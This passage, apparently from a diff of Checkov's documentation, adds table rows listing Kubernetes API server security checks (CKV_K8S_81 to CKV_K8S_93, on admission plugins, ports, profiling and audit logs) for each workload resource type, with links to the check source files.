[ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3257 | CKV_K8S_81 | resource | DeploymentConfig | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3258 | CKV_K8S_81 | resource | Job | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3259 | CKV_K8S_81 | resource | Pod | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy 
is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3260 | CKV_K8S_81 | resource | PodTemplate | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3261 | CKV_K8S_81 | resource | ReplicaSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3262 | CKV_K8S_81 | resource | ReplicationController | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3263 | CKV_K8S_81 | resource | StatefulSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3264 | CKV_K8S_82 | resource | CronJob | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3265 | CKV_K8S_82 | resource | DaemonSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | 
[ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3266 | CKV_K8S_82 | resource | Deployment | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3267 | CKV_K8S_82 | resource | DeploymentConfig | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3268 | CKV_K8S_82 | resource | Job | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3269 | CKV_K8S_82 | resource | Pod | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3270 | CKV_K8S_82 | resource | PodTemplate | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3271 | CKV_K8S_82 | resource | ReplicaSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3272 | CKV_K8S_82 | resource | ReplicationController | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | 
[ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3273 | CKV_K8S_82 | resource | StatefulSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3274 | CKV_K8S_83 | resource | CronJob | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3275 | CKV_K8S_83 | resource | DaemonSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3276 | CKV_K8S_83 | resource | Deployment | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3277 | CKV_K8S_83 | resource | DeploymentConfig | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3278 | CKV_K8S_83 | resource | Job | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3279 | CKV_K8S_83 | resource | Pod | Ensure that the admission control 
plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) |
+| 3280 | CKV_K8S_83 | resource | PodTemplate | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) |
+| 3281 | CKV_K8S_83 | resource | ReplicaSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) |
+| 3282 | CKV_K8S_83 | resource | ReplicationController | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) |
+| 3283 | CKV_K8S_83 | resource | StatefulSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) |
+| 3284 | CKV_K8S_84 | resource | CronJob | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) |
+| 3285 | CKV_K8S_84 | resource | DaemonSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) |
+| 3286 | CKV_K8S_84 | resource | Deployment | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) |
+| 3287 | CKV_K8S_84 | resource | DeploymentConfig | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) |
+| 3288 | CKV_K8S_84 | resource | Job | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) |
+| 3289 | CKV_K8S_84 | resource | Pod | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) |
+| 3290 | CKV_K8S_84 | resource | PodTemplate | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) |
+| 3291 | CKV_K8S_84 | resource | ReplicaSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) |
+| 3292 | CKV_K8S_84 | resource | ReplicationController | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) |
+| 3293 | CKV_K8S_84 | resource | StatefulSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) |
+| 3294 | CKV_K8S_85 | resource | CronJob | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) |
+| 3295 | CKV_K8S_85 | resource | DaemonSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) |
+| 3296 | CKV_K8S_85 | resource | Deployment | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) |
+| 3297 | CKV_K8S_85 | resource | DeploymentConfig | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) |
+| 3298 | CKV_K8S_85 | resource | Job | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) |
+| 3299 | CKV_K8S_85 | resource | Pod | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) |
+| 3300 | CKV_K8S_85 | resource | PodTemplate | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) |
+| 3301 | CKV_K8S_85 | resource | ReplicaSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) |
+| 3302 | CKV_K8S_85 | resource | ReplicationController | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) |
+| 3303 | CKV_K8S_85 | resource | StatefulSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) |
+| 3304 | CKV_K8S_86 | resource | CronJob | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) |
+| 3305 | CKV_K8S_86 | resource | DaemonSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) |
+| 3306 | CKV_K8S_86 | resource | Deployment | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) |
+| 3307 | CKV_K8S_86 | resource | DeploymentConfig | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) |
+| 3308 | CKV_K8S_86 | resource | Job | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) |
+| 3309 | CKV_K8S_86 | resource | Pod | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) |
+| 3310 | CKV_K8S_86 | resource | PodTemplate | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) |
+| 3311 | CKV_K8S_86 | resource | ReplicaSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) |
+| 3312 | CKV_K8S_86 | resource | ReplicationController | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) |
+| 3313 | CKV_K8S_86 | resource | StatefulSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) |
+| 3314 | CKV_K8S_88 | resource | CronJob | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) |
+| 3315 | CKV_K8S_88 | resource | DaemonSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) |
+| 3316 | CKV_K8S_88 | resource | Deployment | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) |
+| 3317 | CKV_K8S_88 | resource | DeploymentConfig | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) |
+| 3318 | CKV_K8S_88 | resource | Job | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) |
+| 3319 | CKV_K8S_88 | resource | Pod | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) |
+| 3320 | CKV_K8S_88 | resource | PodTemplate | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) |
+| 3321 | CKV_K8S_88 | resource | ReplicaSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) |
+| 3322 | CKV_K8S_88 | resource | ReplicationController | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) |
+| 3323 | CKV_K8S_88 | resource | StatefulSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) |
+| 3324 | CKV_K8S_89 | resource | CronJob | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) |
+| 3325 | CKV_K8S_89 | resource | DaemonSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) |
+| 3326 | CKV_K8S_89 | resource | Deployment | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) |
+| 3327 | CKV_K8S_89 | resource | DeploymentConfig | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) |
+| 3328 | CKV_K8S_89 | resource | Job | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) |
+| 3329 | CKV_K8S_89 | resource | Pod | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) |
+| 3330 | CKV_K8S_89 | resource | PodTemplate | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) |
+| 3331 | CKV_K8S_89 | resource | ReplicaSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) |
+| 3332 | CKV_K8S_89 | resource | ReplicationController | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) |
+| 3333 | CKV_K8S_89 | resource | StatefulSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) |
+| 3334 | CKV_K8S_90 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) |
+| 3335 | CKV_K8S_90 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) |
+| 3336 | CKV_K8S_90 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) |
+| 3337 | CKV_K8S_90 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) |
+| 3338 | CKV_K8S_90 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) |
+| 3339 | CKV_K8S_90 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) |
+| 3340 | CKV_K8S_90 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) |
+| 3341 | CKV_K8S_90 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) |
+| 3342 | CKV_K8S_90 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) |
+| 3343 | CKV_K8S_90 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) |
+| 3344 | CKV_K8S_91 | resource | CronJob | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) |
+| 3345 | CKV_K8S_91 | resource | DaemonSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) |
+| 3346 | CKV_K8S_91 | resource | Deployment | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) |
+| 3347 | CKV_K8S_91 | resource | DeploymentConfig | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) |
+| 3348 | CKV_K8S_91 | resource | Job | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) |
+| 3349 | CKV_K8S_91 | resource | Pod | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) |
+| 3350 | CKV_K8S_91 | resource | PodTemplate | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) |
+| 3351 | CKV_K8S_91 | resource | ReplicaSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) |
+| 3352 | CKV_K8S_91 | resource | ReplicationController | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) |
+| 3353 | CKV_K8S_91 | resource | StatefulSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) |
+| 3354 | CKV_K8S_92 | resource | CronJob | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) |
+| 3355 | CKV_K8S_92 | resource | DaemonSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) |
+| 3356 | CKV_K8S_92 | resource | Deployment | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) |
+| 3357 | CKV_K8S_92 | resource | DeploymentConfig | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) |
+| 3358 | CKV_K8S_92 | resource | Job | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) |
+| 3359 | CKV_K8S_92 | resource | Pod | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) |
+| 3360 | CKV_K8S_92 | resource | PodTemplate | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) |
+| 3361 | CKV_K8S_92 | resource | ReplicaSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) |
+| 3362 | CKV_K8S_92 | resource | ReplicationController | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) |
+| 3363 | CKV_K8S_92 | resource | StatefulSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) |
+| 3364 | CKV_K8S_93 | resource | CronJob | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) |
